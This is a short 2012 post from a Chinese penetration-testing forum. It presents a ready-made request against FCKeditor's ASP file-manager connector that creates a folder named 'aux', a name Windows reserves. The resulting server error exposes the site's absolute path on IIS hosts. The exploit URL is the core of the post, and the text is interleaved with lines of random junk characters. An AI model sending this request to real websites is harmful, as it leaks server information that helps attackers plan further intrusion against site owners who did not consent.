中国网络渗透测试联盟
标题:
最新FCKeditor爆绝对路径漏洞
[打印本页]
作者:
admin
时间:
2012-11-21 13:39
标题:
最新FCKeditor爆绝对路径漏洞
代码:FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=%2F&NewFolderName=aux
( ?% D+ Q1 p$ u1 W$ v
) h" Y) r; x" e9 E! R( y D
* @& e5 o' p/ C' ?3 J' n
版本未测试。。。
/ s6 ]# L, Z, M- [2 \ g e
$ q" C: }% u4 |' v/ A. J
原理:新建个aux文件夹,aux在windows系统不支持,所以会报错,爆出绝对路径,这个比较鸡肋。求大神别喷。。。
* P/ }1 _: M6 e" U* @
& K/ i4 ?( y9 E. s- t4 g
& n2 Z/ f8 ~" R: s y$ h2 h. n
听说IIS都可以。。
, x7 `" Y# J# M: C' W
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2